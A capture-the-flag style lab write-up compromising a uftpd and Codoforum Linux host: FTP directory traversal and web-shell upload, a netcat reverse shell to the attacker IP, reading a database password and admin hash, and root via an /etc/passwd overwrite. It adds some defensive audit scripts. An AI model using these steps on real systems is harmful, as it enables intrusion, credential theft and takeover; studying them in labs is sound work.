Web, Easy, Linux
VHL — Forum
uftpd FTP server with anonymous access. Forum application vulnerability exploited to obtain a shell and escalate to root.
February 9, 2025
Virtual Hacking Labs
#FTP #uftpd #Forum #RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:46 EST
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 78.12% done; ETC: 12:48 (0:00:01 remaining)
Nmap scan report for 10.11.1.128
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
Bug in http-generator: no string output.
PORT STATE SERVICE VERSION
21/tcp open ftp
|_ftp-bounce: bounce working!
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| fingerprint-strings:
| GenericLines, NULL, SMBProgNeg:
| 220 uftpd (2.10) ready.
| Help:
| 220 uftpd (2.10) ready.
| 214-The following commands are recognized.
| ABOR DELE USER PASS SYST TYPE PORT EPRT RETR MKD RMD REST MDTM PASV
| EPSV QUIT LIST NLST MLST MLSD CLNT OPTS PWD STOR CWD CDUP SIZE NOOP
| HELP FEAT
| Help OK.
| SSLSessionReq:
| 220 uftpd (2.10) ready.
| command '
|_ recognized by server.
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 e2:65:cc:f6:68:f0:48:c5:67:5d:64:b7:da:df:63:86 (RSA)
| 256 66:31:a1:2b:7e:4b:80:0b:35:01:52:5b:59:3a:40:56 (ECDSA)
|_ 256 e2:8b:2f:8f:f9:10:28:93:a7:f5:3c:08:0d:fe:a0:9f (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: All topics | Forum
|_http-server-header: Apache/2.4.54 (Debian)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
3306/tcp open mysql MySQL 5.5.5-10.5.15-MariaDB-0+deb11u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.5.15-MariaDB-0+deb11u1
| Thread ID: 33
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, LongColumnFlag, ConnectWithDatabase, DontAllowDatabaseTableColumn, IgnoreSigpipes, ODBCClient, SupportsCompression, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, FoundRows, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: \sNkP.3U3>|w`[)W\H2`
|_ Auth Plugin Name: mysql_native_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
21
sh
21/tcp open ftp
|_ftp-bounce: bounce working!
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| fingerprint-strings:
| GenericLines, NULL, SMBProgNeg:
| 220 uftpd (2.10) ready.
| Help:
| 220 uftpd (2.10) ready.
| 214-The following commands are recognized.
| ABOR DELE USER PASS SYST TYPE PORT EPRT RETR MKD RMD REST MDTM PASV
| EPSV QUIT LIST NLST MLST MLSD CLNT OPTS PWD STOR CWD CDUP SIZE NOOP
| HELP FEAT
| Help OK.
| SSLSessionReq:
| 220 uftpd (2.10) ready.
| command '
|_ recognized by server.
anonymous login and upload
sh
ftp anonymous@10.11.1.128
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||51191|)
125 Data connection already open; transfer starting.
226 Transfer complete.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||58445|)
125 Data connection already open; transfer starting.
100% |**************************************************************************************************| 5 26.39 KiB/s 00:00 ETA
226 Transfer complete.
5 bytes sent in 00:00 (0.08 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||55867|)
125 Data connection already open; transfer starting.
-rw-r--r-- 1 0 0 5 Feb 9 12:49 test.txt
226 Transfer complete.
uftpd 2.10 - Directory Traversal (Authenticated)
sh
ftp anonymous@10.11.1.128
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../
229 Entering Extended Passive Mode (|||39519|)
125 Data connection already open; transfer starting.
drwxr-xr-x 1 0 0 28672 Dec 6 10:15 bin
drwxr-xr-x 1 0 0 4096 Dec 6 09:46 boot
drwxr-xr-x 1 0 0 3140 Feb 9 12:46 dev
drwxr-xr-x 1 0 0 4096 Jan 17 04:31 etc
drwxr-xr-x 1 0 0 4096 Dec 6 10:12 home
drwxr-xr-x 1 0 0 4096 Dec 6 10:15 lib
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 lib32
drwxr-xr-x 1 0 0 4096 Dec 6 09:40 lib64
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 libx32
drwx------ 1 0 0 16384 Dec 6 09:36 lost+found
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 media
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 mnt
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 opt
dr-xr-xr-x 1 0 0 0 Feb 9 12:46 proc
drwx------ 1 0 0 4096 Jan 17 04:37 root
drwxr-xr-x 1 0 0 540 Feb 9 12:46 run
drwxr-xr-x 1 0 0 12288 Dec 6 10:15 sbin
drwxr-xr-x 1 0 0 4096 Dec 6 10:12 srv
dr-xr-xr-x 1 0 0 0 Feb 9 12:46 sys
drwxrwxrwx 1 0 0 4096 Feb 9 13:19 tmp
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 usr
drwxr-xr-x 1 0 0 4096 Dec 6 09:43 var
-rw-r--r-- 1 0 0 29091206 Dec 6 09:46 initrd.img
-rw-r--r-- 1 0 0 28978277 Dec 6 09:39 initrd.img.old
-rw-r--r-- 1 0 0 6963648 Oct 21 16:24 vmlinuz
-rw-r--r-- 1 0 0 6962016 Sep 2 09:54 vmlinuz.old
80
sh
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: All topics | Forum
|_http-server-header: Apache/2.4.54 (Debian)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
sh
wget https://raw.githubusercontent.com/Arinerron/uftpd_dirtrav/refs/heads/master/uftpd_dirtrav.py
uftpd 2.10 - Directory Traversal (Authenticated)
sh
ftp anonymous@10.11.1.128
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
229 Entering Extended Passive Mode (|||49435|)
125 Data connection already open; transfer starting.
drwxr-xr-x 1 0 0 28672 Dec 6 10:15 bin
drwxr-xr-x 1 0 0 4096 Dec 6 09:46 boot
drwxr-xr-x 1 0 0 3140 Feb 9 12:46 dev
drwxr-xr-x 1 0 0 4096 Jan 17 04:31 etc
drwxr-xr-x 1 0 0 4096 Dec 6 10:12 home
drwxr-xr-x 1 0 0 4096 Dec 6 10:15 lib
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 lib32
drwxr-xr-x 1 0 0 4096 Dec 6 09:40 lib64
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 libx32
drwx------ 1 0 0 16384 Dec 6 09:36 lost+found
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 media
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 mnt
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 opt
dr-xr-xr-x 1 0 0 0 Feb 9 12:46 proc
drwx------ 1 0 0 4096 Jan 17 04:37 root
drwxr-xr-x 1 0 0 540 Feb 9 12:46 run
drwxr-xr-x 1 0 0 12288 Dec 6 10:15 sbin
drwxr-xr-x 1 0 0 4096 Dec 6 10:12 srv
dr-xr-xr-x 1 0 0 0 Feb 9 12:46 sys
drwxrwxrwx 1 0 0 4096 Feb 9 17:16 tmp
drwxr-xr-x 1 0 0 4096 Dec 6 09:36 usr
drwxr-xr-x 1 0 0 4096 Dec 6 09:43 var
-rw-r--r-- 1 0 0 29091206 Dec 6 09:46 initrd.img
-rw-r--r-- 1 0 0 28978277 Dec 6 09:39 initrd.img.old
-rw-r--r-- 1 0 0 6963648 Oct 21 16:24 vmlinuz
-rw-r--r-- 1 0 0 6962016 Sep 2 09:54 vmlinuz.old
226 Transfer complete.
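The `ls ../../../../` listing above shows the server following `..` components out of the served directory. The containment check a server needs before touching the filesystem, as an added example (not uftpd's code or its fix; `FTP_ROOT` and `resolve_ftp_path` are hypothetical names, and the check is lexical only, so symlinks inside the root need separate handling):

```sh
#!/bin/sh
# Added example: resolve an FTP path argument against the served root and
# refuse anything that climbs above it. Names here are illustrative.

FTP_ROOT="/srv/ftp"

# resolve_ftp_path CWD ARG
#   CWD: client's current directory relative to the virtual root ("/" = root)
#   ARG: path argument from LIST/RETR/STOR/CWD
# Prints the server-side path and returns 0, or prints nothing and returns 1
# when the argument would leave the root.
resolve_ftp_path() {
    printf '%s\n%s\n' "$1" "$2" | awk -v root="$FTP_ROOT" '
        NR == 1 { cwd = $0 }
        NR == 2 { arg = $0 }
        END {
            # An absolute argument is relative to the virtual root, not cwd.
            path = (substr(arg, 1, 1) == "/") ? arg : cwd "/" arg
            n = split(path, part, "/")
            depth = 0
            for (i = 1; i <= n; i++) {
                if (part[i] == "" || part[i] == ".") continue
                if (part[i] == "..") {
                    if (depth == 0) exit 1   # would leave the root: reject
                    depth--
                    continue
                }
                stack[++depth] = part[i]
            }
            out = root
            for (i = 1; i <= depth; i++) out = out "/" stack[i]
            print out
        }'
}

# Constructed sample arguments, including the one used in the session above.
for arg in test.txt ../../../../ /pub/../notes.txt; do
    if p=$(resolve_ftp_path / "$arg"); then
        echo "allow $arg -> $p"
    else
        echo "deny  $arg"
    fi
done
```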
uftpd shell
- https://github.com/Arinerron/uftpd_dirtrav/blob/master/uftpd_dirtrav.py
sh
python3 uftpd_dirtrav.py
[+] uftpd Directory Traversal (Chroot Bypass)
Author: Aaron Esau (Arinerron)
Writeup: https://aaronesau.com/blog/posts/6
[+] Connecting to 10.11.1.128:21...
[*] Banner: 220 uftpd (2.10) ready.
[+] The target appears to be running uftp version 2.10 which is vulnerable
[ ] Opened TCP server on 172.16.1.1:37467
[*] Found a directory with 8 files
[*] Found files with the extension .php, so this path is probably a webserver
[ ] STOP_ON_FIRST is enabled and a path was found, stopping...
[*] Uploading shell.php to /var/www/html/shell.php ...
[ ] Opened TCP server on 172.16.1.1:59861
[+] File uploaded to /var/www/html/shell.php
[+] Hooray, your file was found at http://10.11.1.128/shell.php ...have fun!
$ whoami
www-data
sh
$ busybox nc 172.16.1.1 1234 -e bash
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.128] 55510
python3 -c 'import pty; pty.spawn("/bin/bash")'
priv esc
linpeas
sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
sh
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/wget
╔══════════╣ Installed Compilers
ii gcc 4:10.2.1-1 amd64 GNU C compiler
ii gcc-10 10.2.1-6 amd64 GNU C compiler
sh
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper
sh
Files with capabilities (limited to 50):
/usr/local/sbin/uftpd =ep
/usr/bin/ping cap_net_raw=ep
sh
www-data@forum:/var/www/html/sites/default$ cat config.php
cat config.php
<?php
/*
* @CODOLICENSE
*/
defined('IN_CODOF') or die();
$CF_installed=true;
function get_codo_db_conf() {
$config = array (
'driver' => 'mysql',
'host' => 'localhost',
'database' => 'codoforum',
'username' => 'codoforum',
'password' => '8F0rRUm37C0dO!',
'prefix' => '',
'charset' => 'utf8',
'collation' => 'utf8_unicode_ci',
mysql
sh
www-data@forum:/var/www/html/sites/default$ mysql -u codoforum -p''
mysql -u codoforum -p''
Enter password: 8F0rRUm37C0dO!
sh
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| codoforum |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)
sh
MariaDB [codoforum]> show tables;
show tables;
+-------------------------+
| Tables_in_codoforum |
+-------------------------+
| b8_wordlist |
| codo_attachments |
| codo_badges |
| codo_bans |
| codo_block_roles |
| codo_blocks |
| codo_categories |
| codo_config |
| codo_crons |
| codo_daily_rep_log |
| codo_edits |
| codo_fields |
| codo_fields_roles |
| codo_fields_values |
| codo_import_data |
| codo_logs |
| codo_mail_queue |
| codo_notify |
| codo_notify_queue |
| codo_notify_subscribers |
| codo_notify_text |
| codo_page_roles |
| codo_pages |
| codo_permission_list |
| codo_permissions |
| codo_plugins |
| codo_poll_log |
| codo_poll_options |
| codo_poll_questions |
| codo_posts |
| codo_promotion_rules |
| codo_report_types |
| codo_reports |
| codo_reputation |
| codo_roles |
| codo_sessions |
| codo_signups |
| codo_smileys |
| codo_tags |
| codo_tags_allowed |
| codo_topics |
| codo_unread_categories |
| codo_unread_topics |
| codo_user_badges |
| codo_user_preferences |
| codo_user_roles |
| codo_users |
| codo_views |
+-------------------------+
48 rows in set (0.001 sec)
sh
MariaDB [codoforum]> select * from codo_users;
select * from codo_users;
+----+------------+------------+--------------------------------------------------------------+-------+-----------------------+------------+-------------+-----------+-------------+-------------------+-----------+----------+---------------+----------+------------+-----------------------------+
| id | username | name | pass | token | mail | created | last_access | read_time | user_status | avatar | signature | no_posts | profile_views | oauth_id | reputation | last_notification_view_time |
+----+------------+------------+--------------------------------------------------------------+-------+-----------------------+------------+-------------+-----------+-------------+-------------------+-----------+----------+---------------+----------+------------+-----------------------------+
| 1 | forumadmin | forumadmin | $2a$08$5yBXNQQh0kGOzav3RM4iAeCBVJ.yG6HRHn1rs4BBD4SLtfYjVqb5K | NULL | forum@localhost.local | 1670338579 | 1670400752 | 0 | 1 | F_ffee00.png | NULL | 1 | 6 | 0 | 0 |
sh
$2a$08$5yBXNQQh0kGOzav3RM4iAeCBVJ.yG6HRHn1rs4BBD4SLtfYjVqb5K
capabilities (uftpd)
sh
Files with capabilities (limited to 50):
/usr/local/sbin/uftpd =ep
/usr/bin/ping cap_net_raw=ep
- binary with capabilities is owned by root
sh
$ ls -al /usr/local/sbin/uftpd
-rwxr-xr-x 1 root root 223560 Dec 6 2022 /usr/local/sbin/uftpd
sh
www-data@forum:/etc$ echo 'test' > test2.txt
echo 'test' > test2.txt
bash: test2.txt: Permission denied
sh
/usr/local/sbin/uftpd -n -o ftp=2123 -o writable /etc/
sh
ftp> put test.txt
ftp> ls
229 Entering Extended Passive Mode (|||43387|)
125 Data connection already open; transfer starting.
...
...
-rw-r--r-- 1 0 0 5 Feb 10 00:33 test.txt
-rw-r--r-- 1 0 0 17 Dec 6 09:41 timezone
-rw-r--r-- 1 0 0 1260 Jun 16 01:37 ucf.conf
-rw-r--r-- 1 0 0 4942 Nov 23 09:34 wgetrc
-rw-r--r-- 1 0 0 642 Dec 24 09:58 xattr.conf
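The upload into `/etc` succeeds although `www-data` cannot write there, because `/usr/local/sbin/uftpd` carries `=ep`, which is every capability in the effective and permitted sets. A triage pass over `getcap -r` output that surfaces this kind of grant, as an added example (not part of the original writeup; `audit_caps` and its high-risk list are illustrative choices):

```sh
#!/bin/sh
# Added example: classify file capabilities reported by `getcap -r`.
# audit_caps is an illustrative name; the high-risk list is a starting point.

# Reads getcap lines on stdin, prints "SEVERITY path capabilities".
audit_caps() {
    awk '
        NF < 2 { next }
        {
            caps = $NF
            path = $0
            sub(/[ \t]+[^ \t]+$/, "", path)   # drop the capability field
            sub(/[ \t]+=$/, "", path)         # older libcap prints "path = caps"

            if (caps ~ /^(all)?[=+][eip]+$/)
                sev = "CRITICAL"              # full capability set
            else if (caps ~ /cap_(dac_override|dac_read_search|setuid|setgid|sys_admin|sys_ptrace|sys_module|fowner|chown)/)
                sev = "HIGH"                  # can bypass file permissions or change identity
            else
                sev = "INFO"
            printf "%s %s %s\n", sev, path, caps
        }'
}

# Sample input: the two lines linpeas reported on this host.
audit_caps <<'EOF'
/usr/local/sbin/uftpd =ep
/usr/bin/ping cap_net_raw=ep
EOF

# On a live host: getcap -r / 2>/dev/null | audit_caps
# Remediation for a CRITICAL hit: setcap -r <file>, then grant only what the
# daemon needs (binding port 21 needs cap_net_bind_service at most).
```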
sh
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:1001:1001:,,,:/srv/ftp:/bin/bash
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin
sh
openssl passwd 'root'
$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1
sh
root:$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:1001:1001:,,,:/srv/ftp:/bin/bash
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin
sh
ftp 10.11.1.128 2123
Connected to 10.11.1.128.
220 uftpd (2.10) ready.
Name (10.11.1.128:forum):
331 Login OK, please enter password.
Password:
230 Guest login OK, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||38111|)
125 Data connection already open; transfer starting.
100% |**************************************************************************************************| 1575 21.15 MiB/s 00:00 ETA
226 Transfer complete.
1575 bytes sent in 00:00 (21.93 KiB/s)
- changed root password by modifying /etc/passwd
sh
$ cat /etc/passwd
root:$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:1001:1001:,,,:/srv/ftp:/bin/bash
postfix:x:107:114::/var/spool/postfix:/usr/sbin/nologin
sh
www-data@forum:/etc$ su root
su root
Password: root
root@forum:/etc# whoami
whoami
root
root@forum:/etc# cd /root
cd /root
root@forum:~# cat key.txt
cat key.txt
bhjky7fg3ndsk27hf9mi
root@forum:~# date
date
Mon 10 Feb 2025 12:45:38 AM EST
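The final step leaves a durable artifact: a password hash in the second field of `/etc/passwd`, where a shadowed system keeps `x`. A check that flags such entries and names the hash scheme, as an added example (not part of the original writeup; `audit_passwd` is a hypothetical name and the sample lines are constructed from the output above):

```sh
#!/bin/sh
# Added example: find passwd(5) entries that authenticate outside /etc/shadow.
# audit_passwd is an illustrative name.

# Reads passwd-format lines on stdin. Prints one finding per line:
#   HASH_IN_PASSWD <user> <scheme>   hash stored in the world-readable file
#   EMPTY_PASSWORD <user>            empty password field
#   EXTRA_UID0 <user>                UID 0 account other than root
audit_passwd() {
    awk -F: '
        /^#/ || NF < 7 { next }
        {
            user = $1; pw = $2; uid = $3
            if (pw == "") {
                printf "EMPTY_PASSWORD %s\n", user
            } else if (pw != "x" && pw !~ /^[*!]/) {
                # Identify the crypt(3) scheme from the hash prefix.
                if      (substr(pw, 1, 3) == "$1$") scheme = "md5crypt"
                else if (substr(pw, 1, 3) == "$5$") scheme = "sha256crypt"
                else if (substr(pw, 1, 3) == "$6$") scheme = "sha512crypt"
                else if (substr(pw, 1, 3) == "$y$") scheme = "yescrypt"
                else if (substr(pw, 1, 2) == "$2")  scheme = "bcrypt"
                else                                scheme = "unknown"
                printf "HASH_IN_PASSWD %s %s\n", user, scheme
            }
            if (uid == 0 && user != "root")
                printf "EXTRA_UID0 %s\n", user
        }'
}

# Constructed sample: the modified root entry plus two untouched entries.
audit_passwd <<'EOF'
root:$1$/BZQfh/R$vpjxmi78GHgHShe2zVu2j1:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
forum:x:1000:1000:forum,,,:/home/forum:/bin/bash
EOF

# On a live host: audit_passwd < /etc/passwd
```

Pairing this with file-integrity monitoring on `/etc/passwd` catches the overwrite at write time rather than at the next audit.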